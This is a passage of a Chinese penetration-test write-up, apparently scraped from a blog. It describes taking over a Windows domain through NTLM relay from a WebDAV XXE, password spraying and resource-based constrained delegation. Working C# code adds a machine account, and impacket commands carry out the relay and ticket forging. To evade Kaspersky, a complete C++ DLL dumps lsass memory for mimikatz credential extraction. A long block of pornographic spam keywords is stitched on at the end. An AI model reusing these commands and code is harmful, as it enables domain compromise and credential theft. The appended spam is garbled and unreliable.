質(zhì)詢:服務(wù)器以自己的消息作為響應(yīng),指示其接受的NTLM版本以及要使用的功能。該消息還包括challenge值。
響應(yīng):收到challenge后客戶端用hash將challenge加密,作為NTLM Response字段發(fā)送給服務(wù)器。
NTLM身份驗(yàn)證是基于質(zhì)詢響應(yīng)的協(xié)議,服務(wù)器發(fā)送一個(gè)質(zhì)詢,客戶端對(duì)這個(gè)質(zhì)詢進(jìn)行回復(fù)。如果質(zhì)詢與服務(wù)器計(jì)算的質(zhì)詢匹配,則接受身份驗(yàn)證。

知道了NTLM身份認(rèn)證的大致流程,我們?cè)賮碚fNTLM中繼,如下圖所示,如果我們可以讓Client A 向我們的Evil Server X,發(fā)起NTLM認(rèn)證,那么我們就可以拿Client A的身份驗(yàn)證信息去向Server B進(jìn)行認(rèn)證,這便是ntlm中繼。看到這里你會(huì)覺得說了那么多不就是中間人攻擊么,對(duì)就是中間人攻擊。

知道了NTLM中繼,結(jié)合Java WEBDAV XXE的作用,利用HTTP 401的認(rèn)證,我們可以直接利用WEBDAV服務(wù)器的憑據(jù)向域控發(fā)起認(rèn)證,讓域控以為我們是WEBDAV服務(wù)器。

在域中增加機(jī)器賬戶
在這里可能有同學(xué)有疑問了,前面不是提了中繼么?為什么不用Ghidra 從 XXE 到 RCE和Ghost Potato里提到的方式去Relay回自身調(diào)用RPC進(jìn)行相關(guān)操作,還要增加機(jī)器賬戶呢?因?yàn)檫@個(gè)WEBDAV服務(wù)是system權(quán)限運(yùn)行的,而system賬戶做Relay時(shí)是用機(jī)器賬戶去請(qǐng)求的,沒有辦法去調(diào)高權(quán)限RPC接口,所有這里不能直接Relay回自身調(diào)用RPC。

既然不能直接Relay回自身調(diào)用RPC,我們換一種思路,用基于資源約束委派一樣可以獲取權(quán)限。白嫖的福音網(wǎng)安學(xué)習(xí)資料》》

在通過基于資源約束委派進(jìn)行利用時(shí),需要有一個(gè)機(jī)器賬戶來配合(這里說法其實(shí)不太準(zhǔn)確,應(yīng)該是需要一個(gè)具有SPN的賬戶,更詳細(xì)的說是需要一個(gè)賬戶的TGT,而一個(gè)機(jī)器賬戶來代替前面的說法,是因?yàn)闄C(jī)器賬戶默認(rèn)具有一些SPN,這些SPN包含了我們后面會(huì)用到的cifs等,這里就不細(xì)說了,不然又是一篇文章了,后面統(tǒng)一用機(jī)器賬戶來描述),而默認(rèn)域控的ms-DS-MachineAccountQuota屬性設(shè)置允許所有域用戶向一個(gè)域添加多達(dá)10個(gè)計(jì)算機(jī)帳戶,就是說只要有一個(gè)域憑據(jù)就可以在域內(nèi)任意添加機(jī)器賬戶。這個(gè)憑據(jù)可以是域內(nèi)的用戶賬戶、服務(wù)賬戶、機(jī)器賬戶。

那么問題又來了,既然需要一個(gè)機(jī)器賬戶,前面提到的

system賬戶做Relay時(shí)是用機(jī)器賬戶去請(qǐng)求

這個(gè)地方說的機(jī)器賬戶,也就是我們文中的WEBDAV服務(wù)器的機(jī)器賬戶,為什么不用這個(gè)機(jī)器賬戶,要自己去增加一個(gè)呢?了解基于資源約束委派的同學(xué)應(yīng)該知道,我們需要用機(jī)器賬戶去申請(qǐng)TGT票據(jù),但是我們?nèi)绻肳EBDAV服務(wù)器的機(jī)器賬戶,我們不知道這個(gè)機(jī)器賬戶的密碼或者h(yuǎn)ash。沒有辦法去申請(qǐng)TGT。如果是我們創(chuàng)建的機(jī)器賬戶,我們是知道密碼的,這樣才能去申請(qǐng)TGT了,這里就不在深入繼續(xù)分析了,里面涉及到的過程極其復(fù)雜,有興趣的同學(xué)可以自行學(xué)習(xí)。

回歸正題,我們?cè)趺丛谟蛑腥?chuàng)建一個(gè)機(jī)器賬戶。

我們把在之前的discuz數(shù)據(jù)庫(kù)中的用戶名整理成字典,并通過kerberos AS_REQ返回包來判斷用戶名是否存在。

接下來將discuz的密碼拿到cmd5上批量解密,解密后發(fā)現(xiàn)大部分用戶的登錄密碼都是P@ssw0rd,于是使用密碼噴射(一個(gè)密碼和不同用戶名的組合去KDC枚舉) ,成功獲取到了一個(gè)域憑據(jù)n0thing@blueteam.com:P@ssw0rd

有了域憑據(jù)后就能連接域控ldap添加機(jī)器賬戶了,不得不說.net真是個(gè)好語言,用System.DirectoryServices.Protocols這個(gè)東西很輕松就能實(shí)現(xiàn)該功能。

... //連接ldap System.DirectoryServices.Protocols.LdapDirectoryIdentifier identifier = new System.DirectoryServices.Protocols.LdapDirectoryIdentifier(DomainController, 389); NetworkCredential nc = new NetworkCredential(username, password); //使用憑據(jù)登錄 System.DirectoryServices.Protocols.LdapConnection connection = null;connection = new System.DirectoryServices.Protocols.LdapConnection(identifier,nc);connection.SessionOptions.Sealing = true; connection.SessionOptions.Signing = true; connection.Bind();var request = new System.DirectoryServices.Protocols.AddRequest(distinguished_name, new System.DirectoryServices.Protocols.DirectoryAttribute[] { new System.DirectoryServices.Protocols.DirectoryAttribute("DnsHostName", machine_account +"."+ Domain), new System.DirectoryServices.Protocols.DirectoryAttribute("SamAccountName", sam_account), new System.DirectoryServices.Protocols.DirectoryAttribute("userAccountControl", "4096"), new System.DirectoryServices.Protocols.DirectoryAttribute("unicodePwd", Encoding.Unicode.GetBytes("\"" + new_MachineAccount_password + "\"")), new System.DirectoryServices.Protocols.DirectoryAttribute("objectClass", "Computer"), new System.DirectoryServices.Protocols.DirectoryAttribute("ServicePrincipalName", "HOST/"+machine_account+"."+Domain,"RestrictedKrbHost/"+machine_account+"."+Domain,"HOST/"+machine_account,"RestrictedKrbHost/"+machine_account)connection.SendRequest(request); Console.WriteLine("[+] Machine account: " + machine_account + " Password: "+ new_MachineAccount_password + " added"); ...

有細(xì)心的同學(xué)看到這里可能會(huì)想: “用xxe中繼到域控的ldap然后添加一個(gè)機(jī)器賬戶不是美滋滋? 哪需要這么花里胡哨的!”。但是域控不允許在未加密的連接上創(chuàng)建計(jì)算機(jī)帳戶,這里關(guān)于加密涉及到tls/ssl和sasl,又是一堆的知識(shí),這里就不細(xì)聊了。

用.net寫的小工具很輕松地添加上了一個(gè)機(jī)器賬戶。

現(xiàn)在我們有了機(jī)器賬戶,接下來就利用基于資源的約束委派。

基于資源的約束委派

Windows Server 2012中新加入了基于kerberos資源的約束委派(rbcd),與傳統(tǒng)的約束委派相比,它 不再需要域管理員對(duì)其進(jìn)行配置,可以直接在機(jī)器賬戶上配置msDS-AllowedToActOnBehalfOfOtherIdentity屬性來設(shè)置基于資源的約束委派。此屬性的作用是控制哪些用戶可以模擬成域內(nèi)任意用戶,然后向該計(jì)算機(jī)(dev2)進(jìn)行身份驗(yàn)證。簡(jiǎn)而言之: 如果我們可以修改該屬性那么我們就能拿到一張域管理員的票據(jù),但該票據(jù)只對(duì)這臺(tái)機(jī)器(dev2)生效,然后拿這張票據(jù)去對(duì)這臺(tái)機(jī)器(dev2)進(jìn)行認(rèn)證(這里只是簡(jiǎn)單描述,可能不太準(zhǔn)確,還是那句話基于資源的約束委派整個(gè)過程細(xì)節(jié)及其復(fù)雜,筆者也不敢說掌握全部細(xì)節(jié))。

現(xiàn)在我們開始實(shí)際操作,首先在我們的VPS上利用impacket工具包中的ntlmrelayx.py工具監(jiān)聽。

./ntlmrelayx.py -t ldap://ad1.blueteam.com -debug -ip 192.168.20.140 --delegate-access --escalate-user evilpc\$

然后用xxe請(qǐng)求我們的VPS,接著將憑據(jù)中繼到域控服務(wù)器的LDAP服務(wù)上設(shè)置基于資源約束委派。

再用s4u協(xié)議申請(qǐng)高權(quán)限票據(jù)。

python getST.py -dc-ip ad1.blueteam.com blueteam/evilpc\$:123456 -spn cifs/dev1.blueteam.com -impersonate administrator

獲得服務(wù)票據(jù)以后就可以直接登錄WEBDAV服務(wù)器了

export KRB5CCNAME=administrator.ccache python smbexec.py -no-pass -k dev1.blueteam.com

整個(gè)RCE過程到此結(jié)束了,但是還沒有拿下域控,滲透任務(wù)還沒有結(jié)束,先上一個(gè)GIF演示整個(gè)RCE過程,接下來再講怎么拿下域控。

卡巴斯基的對(duì)抗

其實(shí)拿下域控的過程很常規(guī),就是在WEBDAV服務(wù)器上抓到了域管理員的賬戶密碼。但是這里難點(diǎn)是卡巴斯基的對(duì)抗,繞不過你就拿不到域管理員的賬戶密碼。

這里安裝的卡巴斯基全方位防護(hù)版來進(jìn)行測(cè)試。

1. 繞過卡巴斯基橫向移動(dòng)
在真實(shí)場(chǎng)景中并不會(huì)像本地環(huán)境一樣順利,當(dāng)我們拿到一張高權(quán)限票據(jù)后準(zhǔn)備對(duì)dev2機(jī)器進(jìn)行pass the ticket時(shí)存在卡巴斯基怎么辦呢?常規(guī)的smbexec.py會(huì)被攔截的。

我們這里的繞過方法是用smb上傳一個(gè)beacon再通過創(chuàng)建啟動(dòng)服務(wù)執(zhí)行beacon全程無攔截,當(dāng)然beacon.exe需要進(jìn)行免殺處理。

2. 繞過卡巴斯基抓lsass中的密碼
我想最糟心的事情莫過于知道域管理員登錄過這臺(tái)機(jī)器,但卻沒有辦法抓密碼。下面將介紹如何解決這個(gè)問題。相信在紅隊(duì)行動(dòng)中遇到卡巴斯基的小伙伴不少,也知道他對(duì)防止從lsass中抓取密碼做的是多么的變態(tài)。即使你使用微軟簽名的內(nèi)存dump工具也會(huì)被攔截,更不用說什么mimikatz了。

偶然在國(guó)外大佬博客上看到了一篇通過RPC調(diào)用添加一個(gè)SSP dll的文章Exploring Mimikatz - Part 2 - SSP,突然醍醐灌頂,lsass自身絕對(duì)可以讀自己內(nèi)存呀,加載dll到lsass進(jìn)程然后dump內(nèi)存不是就可以繞過了? 不禁感嘆:站在巨人肩膀上看到的世界果然更為遼闊。

下載編譯這個(gè)代碼ssp_dll.c 然后再寫一個(gè)dump 進(jìn)程內(nèi)存的dll。

#include <cstdio> #include <windows.h> #include <DbgHelp.h> #include <iostream> #include <TlHelp32.h> #pragma comment(lib,"Dbghelp.lib") typedef HRESULT(WINAPI* _MiniDumpW)(DWORD arg1, DWORD arg2, PWCHAR cmdline);typedef NTSTATUS(WINAPI* _RtlAdjustPrivilege)(ULONG Privilege, BOOL Enable,BOOL CurrentThread, PULONG Enabled);int dump() {HRESULT hr;_MiniDumpW MiniDumpW;_RtlAdjustPrivilege RtlAdjustPrivilege;ULONG t;MiniDumpW = (_MiniDumpW)GetProcAddress(LoadLibrary(L"comsvcs.dll"), "MiniDumpW");RtlAdjustPrivilege = (_RtlAdjustPrivilege)GetProcAddress(GetModuleHandle(L"ntdll"), "RtlAdjustPrivilege");if (MiniDumpW == NULL) {return 0;}// try enable debug privilegeRtlAdjustPrivilege(20, TRUE, FALSE, &t);wchar_t ws[100];swprintf(ws, 100, L"%hs", "784 c:\\1.bin full"); //784是lsass進(jìn)程的pid號(hào) "<pid> <dump.bin> full" MiniDumpW(0, 0, ws);return 0;}BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {switch (ul_reason_for_call) {case DLL_PROCESS_ATTACH:dump();break;case DLL_THREAD_ATTACH:case DLL_THREAD_DETACH:case DLL_PROCESS_DETACH:break;}return TRUE; }

這樣就繞過了卡巴斯基dump到了lsass的內(nèi)存了。

最后本地導(dǎo)入mimikatz的常規(guī)操作就不細(xì)說了,上幾個(gè)截圖。

mimikatz # sekurlsa::minidump 1.bin mimikatz # sekurlsa::logonPasswords full

到此是真的要結(jié)束了,有域管理員的賬戶密碼,怎么拿下域控,我相信這個(gè)不用多說了。

總結(jié)

我們回顧一下,從discuz到xxe,從xxe到域控,整個(gè)過程我們?cè)谡鎸?shí)的滲透過程中其實(shí)沒有花費(fèi)太多時(shí)間,可能得益于平時(shí)的積累。針對(duì)此次滲透,我們還是收獲滿滿,希望你也是。

最后最后白嫖網(wǎng)安學(xué)習(xí)資料!!!

總結(jié)

以上是生活随笔為你收集整理的“不一样”的真实渗透测试案例分析的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。

77777熟女视频在线观看 а天堂中文在线官网 | 伊在人天堂亚洲香蕉精品区 | 日日麻批免费40分钟无码 | 亚洲欧美精品aaaaaa片 | 精品熟女少妇av免费观看 | 国产精品va在线播放 | 久久久久亚洲精品中文字幕 | 男女猛烈xx00免费视频试看 | 99国产欧美久久久精品 | 日本熟妇人妻xxxxx人hd | 99久久精品无码一区二区毛片 | 国产又爽又黄又刺激的视频 | 日本va欧美va欧美va精品 | 久久99精品国产.久久久久 | 曰韩少妇内射免费播放 | 免费看少妇作爱视频 | 国产莉萝无码av在线播放 | 亚洲成av人片在线观看无码不卡 | 鲁大师影院在线观看 | 国产成人无码a区在线观看视频app | 亚洲综合无码一区二区三区 | 国内少妇偷人精品视频免费 | 国内精品久久久久久中文字幕 | 捆绑白丝粉色jk震动捧喷白浆 | 日本va欧美va欧美va精品 | 四虎影视成人永久免费观看视频 | 亚洲gv猛男gv无码男同 | 伊在人天堂亚洲香蕉精品区 | 亚洲人成网站免费播放 | 九九综合va免费看 | 少妇人妻偷人精品无码视频 | 粉嫩少妇内射浓精videos | 亚洲色无码一区二区三区 | 日韩精品久久久肉伦网站 | 国产精品自产拍在线观看 | 国产av无码专区亚洲awww | 久久人人97超碰a片精品 | 亚洲日韩av片在线观看 | 荫蒂被男人添的好舒服爽免费视频 | aⅴ亚洲 日韩 色 图网站 播放 | 无码国产色欲xxxxx视频 | 亚洲欧美中文字幕5发布 | 亚洲乱码日产精品bd | 中文字幕av无码一区二区三区电影 | 色婷婷av一区二区三区之红樱桃 | www国产亚洲精品久久网站 | 国产高清不卡无码视频 | 人妻有码中文字幕在线 | 99国产欧美久久久精品 | 亚洲精品欧美二区三区中文字幕 | а√天堂www在线天堂小说 | 国产午夜精品一区二区三区嫩草 | 亚洲精品无码人妻无码 | 中文字幕人妻丝袜二区 | 国产精品久久福利网站 | 久久这里只有精品视频9 | 久久人人爽人人爽人人片av高清 | 曰本女人与公拘交酡免费视频 | 久久久久久久人妻无码中文字幕爆 | 日韩欧美中文字幕公布 | 久久久久免费看成人影片 | 人人澡人摸人人添 | 67194成是人免费无码 | 国产精品国产三级国产专播 | 国产精品.xx视频.xxtv | 欧美丰满熟妇xxxx性ppx人交 | 国产一区二区三区精品视频 | 亚洲欧美国产精品专区久久 | 粉嫩少妇内射浓精videos | 国产精品资源一区二区 | 人妻体内射精一区二区三四 | 小泽玛莉亚一区二区视频在线 | 亚洲精品国产精品乱码视色 | 少妇性l交大片 | 精品国偷自产在线视频 | 一个人免费观看的www视频 | 国产乱子伦视频在线播放 | 国产绳艺sm调教室论坛 | 久久国产精品精品国产色婷婷 | 国产无遮挡又黄又爽又色 | 亚洲va中文字幕无码久久不卡 | 蜜桃av蜜臀av色欲av麻 999久久久国产精品消防器材 | 小泽玛莉亚一区二区视频在线 | 全球成人中文在线 | 亚洲午夜无码久久 | 久久精品国产一区二区三区 | 久久www免费人成人片 | 国产精品久久久久无码av色戒 | 日本免费一区二区三区最新 | av香港经典三级级 在线 | 精品无码一区二区三区的天堂 | 亚洲国产成人av在线观看 | 内射老妇bbwx0c0ck | 精品亚洲韩国一区二区三区 | 欧洲精品码一区二区三区免费看 | 亚洲国产精品久久人人爱 | 人人爽人人澡人人人妻 | 大地资源网第二页免费观看 | 国产区女主播在线观看 | 国产精品无码成人午夜电影 | 狠狠色噜噜狠狠狠狠7777米奇 | 久久久国产一区二区三区 | 日韩精品无码一本二本三本色 | 久久精品人妻少妇一区二区三区 | 少妇人妻av毛片在线看 | 国产精品99爱免费视频 | 麻豆果冻传媒2021精品传媒一区下载 | 国产凸凹视频一区二区 | 人妻插b视频一区二区三区 | 亚洲国产日韩a在线播放 | 精品亚洲韩国一区二区三区 | 男人扒开女人内裤强吻桶进去 | 无码乱肉视频免费大全合集 | 无码吃奶揉捏奶头高潮视频 | 国产在热线精品视频 | 日韩av无码一区二区三区 | 97精品人妻一区二区三区香蕉 | 麻花豆传媒剧国产免费mv在线 | 久久成人a毛片免费观看网站 | 伊人久久大香线蕉亚洲 | 日本一卡2卡3卡4卡无卡免费网站 国产一区二区三区影院 | 亚洲男人av香蕉爽爽爽爽 | 伊人久久大香线蕉亚洲 | 久久久久se色偷偷亚洲精品av | 亚洲の无码国产の无码步美 | 国产人成高清在线视频99最全资源 | 99久久婷婷国产综合精品青草免费 | 国内揄拍国内精品少妇国语 | 无码精品人妻一区二区三区av | 夫妻免费无码v看片 | 香港三级日本三级妇三级 | 鲁大师影院在线观看 | 日韩欧美中文字幕在线三区 | 婷婷丁香五月天综合东京热 | 国产成人久久精品流白浆 | 国产精品人妻一区二区三区四 | 性生交大片免费看l | 夜精品a片一区二区三区无码白浆 | 曰本女人与公拘交酡免费视频 | 久久久久久亚洲精品a片成人 | 漂亮人妻洗澡被公强 日日躁 | 欧美丰满老熟妇xxxxx性 | 亚洲日本va中文字幕 | 18无码粉嫩小泬无套在线观看 | 欧美猛少妇色xxxxx | 一区二区三区高清视频一 | 丝袜美腿亚洲一区二区 | 精品国产国产综合精品 | 成人免费视频视频在线观看 免费 | 无码人妻精品一区二区三区不卡 | 在教室伦流澡到高潮hnp视频 | 免费观看的无遮挡av | 国产成人无码av在线影院 | 久久 国产 尿 小便 嘘嘘 | 天堂а√在线地址中文在线 | 亚洲欧美日韩综合久久久 | 男女下面进入的视频免费午夜 | 精品国产一区二区三区av 性色 | 成人综合网亚洲伊人 | 国产免费无码一区二区视频 | 无码人妻丰满熟妇区五十路百度 | 97精品人妻一区二区三区香蕉 | 亚洲s码欧洲m码国产av | 成人无码视频在线观看网站 | 国产欧美熟妇另类久久久 | 天干天干啦夜天干天2017 | 日本爽爽爽爽爽爽在线观看免 | 狠狠色丁香久久婷婷综合五月 | 又粗又大又硬又长又爽 | 无码免费一区二区三区 | 99精品无人区乱码1区2区3区 | 国産精品久久久久久久 | 97精品人妻一区二区三区香蕉 | 青青青手机频在线观看 | 国产精品无码成人午夜电影 | a片免费视频在线观看 | 日欧一片内射va在线影院 | 色噜噜亚洲男人的天堂 | 国产成人无码av在线影院 | 永久免费观看国产裸体美女 | 欧美日韩一区二区免费视频 | 成人毛片一区二区 | 亚洲色大成网站www国产 | 久久 国产 尿 小便 嘘嘘 | 中文久久乱码一区二区 | 日韩精品无码一区二区中文字幕 | 日日躁夜夜躁狠狠躁 | 亚洲精品国产第一综合99久久 | 男人的天堂2018无码 | 九九综合va免费看 | 一本久道高清无码视频 | 国产精品高潮呻吟av久久4虎 | 丰满少妇高潮惨叫视频 | 国产成人亚洲综合无码 | 99久久久无码国产精品免费 | 国产99久久精品一区二区 | 中文字幕日韩精品一区二区三区 | 精品 日韩 国产 欧美 视频 | 在线欧美精品一区二区三区 | 天干天干啦夜天干天2017 | 久久精品人人做人人综合试看 | 国产无套内射久久久国产 | 国内精品人妻无码久久久影院蜜桃 | 国产精品久久久av久久久 | 55夜色66夜色国产精品视频 | 精品国偷自产在线视频 | 国产69精品久久久久app下载 | 日日麻批免费40分钟无码 | 草草网站影院白丝内射 | 久久国产劲爆∧v内射 | 99久久人妻精品免费二区 | 久久精品国产99久久6动漫 | 在线观看欧美一区二区三区 | 又粗又大又硬毛片免费看 | 动漫av网站免费观看 | 欧美性猛交内射兽交老熟妇 | 中文字幕无码热在线视频 | 又黄又爽又色的视频 | 蜜臀av在线播放 久久综合激激的五月天 | 欧美阿v高清资源不卡在线播放 | √8天堂资源地址中文在线 | 精品人妻人人做人人爽夜夜爽 | 久久久久免费看成人影片 | 久久国语露脸国产精品电影 | 国产精品久久久午夜夜伦鲁鲁 | 国产精品亚洲综合色区韩国 | 俄罗斯老熟妇色xxxx | 99视频精品全部免费免费观看 | 国产欧美亚洲精品a | 久久99精品国产.久久久久 | 欧美性生交xxxxx久久久 | 精品国产一区av天美传媒 | 台湾无码一区二区 | 中文字幕乱码人妻二区三区 | 国产香蕉尹人综合在线观看 | 白嫩日本少妇做爰 | √天堂中文官网8在线 | aⅴ在线视频男人的天堂 | 99久久99久久免费精品蜜桃 | 久久久久国色av免费观看性色 | 国产精品办公室沙发 | 日本va欧美va欧美va精品 | 欧美亚洲日韩国产人成在线播放 | 99久久精品午夜一区二区 | 久久精品国产大片免费观看 | 一二三四社区在线中文视频 | 久久久婷婷五月亚洲97号色 | 天天综合网天天综合色 | 天天摸天天碰天天添 | 熟妇人妻中文av无码 | 精品少妇爆乳无码av无码专区 | 国产亚洲精品久久久久久久久动漫 | 男女下面进入的视频免费午夜 | 蜜臀av在线观看 在线欧美精品一区二区三区 | 亚洲精品久久久久avwww潮水 | 亚洲自偷自偷在线制服 | 亚洲一区二区三区含羞草 | 亚洲阿v天堂在线 | 亚洲熟悉妇女xxx妇女av | 精品国产一区二区三区四区 | 日韩亚洲欧美精品综合 | 思思久久99热只有频精品66 | 18黄暴禁片在线观看 | 少妇人妻偷人精品无码视频 | 日本丰满护士爆乳xxxx | 欧美激情内射喷水高潮 | 无码人妻少妇伦在线电影 | 真人与拘做受免费视频一 | 国产成人无码av在线影院 | 真人与拘做受免费视频 | 亚洲综合久久一区二区 | 性欧美牲交xxxxx视频 | 亚洲欧美精品伊人久久 | 国产成人无码午夜视频在线观看 | 任你躁国产自任一区二区三区 | 亚洲 另类 在线 欧美 制服 | 中文字幕乱码中文乱码51精品 | 成人综合网亚洲伊人 | ass日本丰满熟妇pics | 乌克兰少妇xxxx做受 | 图片小说视频一区二区 | 无码av免费一区二区三区试看 | 久久99精品久久久久久 | 美女极度色诱视频国产 | 午夜精品久久久久久久 | 300部国产真实乱 | 日本护士毛茸茸高潮 | 欧美人与善在线com | 无遮无挡爽爽免费视频 | 亚洲毛片av日韩av无码 | аⅴ资源天堂资源库在线 | 国产真实夫妇视频 | 欧美xxxx黑人又粗又长 | 5858s亚洲色大成网站www | 亚洲精品成人av在线 | 天堂亚洲2017在线观看 | 鲁鲁鲁爽爽爽在线视频观看 | 亚洲一区二区三区国产精华液 | 丰满肥臀大屁股熟妇激情视频 | 欧美成人高清在线播放 | 中文字幕久久久久人妻 | 男人和女人高潮免费网站 | 国产成人久久精品流白浆 | 性色欲情网站iwww九文堂 | 日本熟妇乱子伦xxxx | 亚洲一区二区三区含羞草 | 骚片av蜜桃精品一区 | 久久久久免费看成人影片 | 免费国产成人高清在线观看网站 | 无码午夜成人1000部免费视频 | 两性色午夜免费视频 | 中文字幕无码热在线视频 | 国产精品办公室沙发 | 丝袜人妻一区二区三区 | 免费人成在线观看网站 | 美女黄网站人色视频免费国产 | 51国偷自产一区二区三区 | 亚洲一区二区观看播放 | 无码精品人妻一区二区三区av | 强伦人妻一区二区三区视频18 | 久久久久成人精品免费播放动漫 | 国产熟妇高潮叫床视频播放 | 欧美精品在线观看 | 丰满少妇女裸体bbw | 国产成人无码av片在线观看不卡 | 精品少妇爆乳无码av无码专区 | 3d动漫精品啪啪一区二区中 | 日本免费一区二区三区最新 | 亚洲国产成人av在线观看 | 精品一区二区不卡无码av | 日本一本二本三区免费 | 欧美人与禽猛交狂配 | 亚洲中文字幕无码一久久区 | 中文久久乱码一区二区 | 久久久久久亚洲精品a片成人 | 亚洲午夜久久久影院 | 精品日本一区二区三区在线观看 | 中文字幕日韩精品一区二区三区 | 玩弄中年熟妇正在播放 | 精品无码一区二区三区的天堂 | 又色又爽又黄的美女裸体网站 | 亚洲色www成人永久网址 | 乱人伦中文视频在线观看 | 国产精品久久久久久亚洲影视内衣 | 啦啦啦www在线观看免费视频 | 美女毛片一区二区三区四区 | 国产性生大片免费观看性 | 国产国产精品人在线视 | 女人被男人爽到呻吟的视频 | 国精产品一品二品国精品69xx | 蜜臀av在线观看 在线欧美精品一区二区三区 | 亚洲色成人中文字幕网站 | 欧美高清在线精品一区 | 国产成人午夜福利在线播放 | 久久精品国产一区二区三区 | 麻豆国产人妻欲求不满谁演的 | 丁香花在线影院观看在线播放 | 国产情侣作爱视频免费观看 | 黑人玩弄人妻中文在线 | 亚洲人成网站在线播放942 | 激情爆乳一区二区三区 | 亚洲无人区一区二区三区 | 国产色视频一区二区三区 | 亚洲午夜福利在线观看 | 亚洲日韩乱码中文无码蜜桃臀网站 | 成熟女人特级毛片www免费 | 99riav国产精品视频 | 无码人妻av免费一区二区三区 | 中文字幕乱码中文乱码51精品 | 国内丰满熟女出轨videos | 亚洲男人av天堂午夜在 | 国产亚洲视频中文字幕97精品 | 夜先锋av资源网站 | 伊人色综合久久天天小片 | 免费无码一区二区三区蜜桃大 | 欧美亚洲国产一区二区三区 | 丰满肥臀大屁股熟妇激情视频 | 一本色道久久综合亚洲精品不卡 | 久久亚洲中文字幕精品一区 | 51国偷自产一区二区三区 | 国产在线精品一区二区高清不卡 | 久久午夜夜伦鲁鲁片无码免费 | 三上悠亚人妻中文字幕在线 | 又大又硬又爽免费视频 | 精品偷自拍另类在线观看 | 波多野结衣aⅴ在线 | 少妇人妻av毛片在线看 | 牲欲强的熟妇农村老妇女 | 日韩欧美群交p片內射中文 | 天堂а√在线中文在线 | 国产9 9在线 | 中文 | 88国产精品欧美一区二区三区 | 无码福利日韩神码福利片 | av人摸人人人澡人人超碰下载 | 久久精品女人天堂av免费观看 | 一本色道久久综合亚洲精品不卡 | 少妇高潮一区二区三区99 | 亚洲国产成人a精品不卡在线 | 中文字幕av日韩精品一区二区 | 日本大乳高潮视频在线观看 | 欧美zoozzooz性欧美 | 少妇人妻偷人精品无码视频 | 图片区 小说区 区 亚洲五月 | 色老头在线一区二区三区 | yw尤物av无码国产在线观看 | 成人亚洲精品久久久久软件 | 成人精品视频一区二区三区尤物 | 成人综合网亚洲伊人 | 成人欧美一区二区三区黑人 | 久久综合网欧美色妞网 | 久精品国产欧美亚洲色aⅴ大片 | 亚洲色偷偷男人的天堂 | 色欲综合久久中文字幕网 | 蜜桃视频韩日免费播放 | 国产精品高潮呻吟av久久4虎 | 中文字幕+乱码+中文字幕一区 | 理论片87福利理论电影 | 装睡被陌生人摸出水好爽 | 国产精品无码永久免费888 | 婷婷综合久久中文字幕蜜桃三电影 | 国产精品人人爽人人做我的可爱 | 中文字幕无码免费久久99 | 国产成人精品视频ⅴa片软件竹菊 | 九九久久精品国产免费看小说 | 中文字幕人妻无码一区二区三区 | 久精品国产欧美亚洲色aⅴ大片 | 久久久精品456亚洲影院 | 亚洲一区二区三区国产精华液 | 亚洲男女内射在线播放 | 精品久久久无码人妻字幂 | 天天燥日日燥 | 成人一在线视频日韩国产 | 99在线 | 亚洲 | 国产熟妇高潮叫床视频播放 | 波多野42部无码喷潮在线 | 少妇无码av无码专区在线观看 | 99久久人妻精品免费二区 | 人人妻人人澡人人爽人人精品浪潮 | 欧美成人免费全部网站 | 爆乳一区二区三区无码 | 成人免费视频在线观看 | 97久久超碰中文字幕 | 无码人妻丰满熟妇区五十路百度 | 一本大道伊人av久久综合 | 亚洲成a人一区二区三区 | 好屌草这里只有精品 | 久久午夜夜伦鲁鲁片无码免费 | 国产真实乱对白精彩久久 | 欧美zoozzooz性欧美 | 国产福利视频一区二区 | 国产乱人偷精品人妻a片 | 人妻体内射精一区二区三四 | 久久国语露脸国产精品电影 | 亚洲一区二区三区含羞草 | 国产精品亚洲专区无码不卡 | 日韩人妻无码一区二区三区久久99 | 国产精品丝袜黑色高跟鞋 | 亚洲成av人片在线观看无码不卡 | 国产精品毛片一区二区 | 国产亚洲精品久久久久久大师 | 成人aaa片一区国产精品 | a在线亚洲男人的天堂 | 久久精品人妻少妇一区二区三区 | 伊人久久大香线焦av综合影院 | 人人妻人人澡人人爽欧美一区九九 | 荡女精品导航 | 妺妺窝人体色www婷婷 | 国产精品无码永久免费888 | 亚洲精品国偷拍自产在线麻豆 | 老太婆性杂交欧美肥老太 | 人人澡人人妻人人爽人人蜜桃 | 久久精品人人做人人综合 | 5858s亚洲色大成网站www | 国产精品理论片在线观看 | 成人一区二区免费视频 | 18无码粉嫩小泬无套在线观看 | 日本xxxx色视频在线观看免费 | 在教室伦流澡到高潮hnp视频 | 性欧美牲交在线视频 | 久久精品中文字幕大胸 | 中文字幕无码免费久久9一区9 | 久久久久久久久蜜桃 | 又色又爽又黄的美女裸体网站 | 国产xxx69麻豆国语对白 | 国产肉丝袜在线观看 | 久久国产精品二国产精品 | 在线观看国产午夜福利片 | 久久婷婷五月综合色国产香蕉 | 成熟妇人a片免费看网站 | 久久99热只有频精品8 | 国产成人综合美国十次 | 狠狠色丁香久久婷婷综合五月 | 亚洲色欲久久久综合网东京热 | 任你躁国产自任一区二区三区 | av香港经典三级级 在线 | 中文字幕无码免费久久99 | 午夜精品久久久内射近拍高清 | 丰腴饱满的极品熟妇 | 久久精品国产一区二区三区肥胖 | 国产精品毛多多水多 | 精品无码一区二区三区的天堂 | 国产精品久久久久9999小说 | 亚洲精品国产品国语在线观看 | 欧美国产亚洲日韩在线二区 | 老熟妇乱子伦牲交视频 | 精品国产乱码久久久久乱码 | 永久免费观看美女裸体的网站 | √天堂资源地址中文在线 | 呦交小u女精品视频 | 亚洲综合在线一区二区三区 | 久久久久久久久蜜桃 | 国产成人人人97超碰超爽8 | 中文字幕无码日韩欧毛 | 亚洲国产av精品一区二区蜜芽 | 久久精品国产亚洲精品 | 人妻少妇精品久久 | 亚洲日韩乱码中文无码蜜桃臀网站 | 日本护士xxxxhd少妇 | 天天拍夜夜添久久精品大 | 亚洲中文字幕无码中文字在线 | 无码吃奶揉捏奶头高潮视频 | 红桃av一区二区三区在线无码av | 国产精品永久免费视频 | 正在播放东北夫妻内射 | 精品国产国产综合精品 | 夫妻免费无码v看片 | 帮老师解开蕾丝奶罩吸乳网站 | 久久久婷婷五月亚洲97号色 | 亚洲国产成人a精品不卡在线 | 国产农村乱对白刺激视频 | 麻豆人妻少妇精品无码专区 | 麻豆国产人妻欲求不满谁演的 | 精品国产乱码久久久久乱码 | 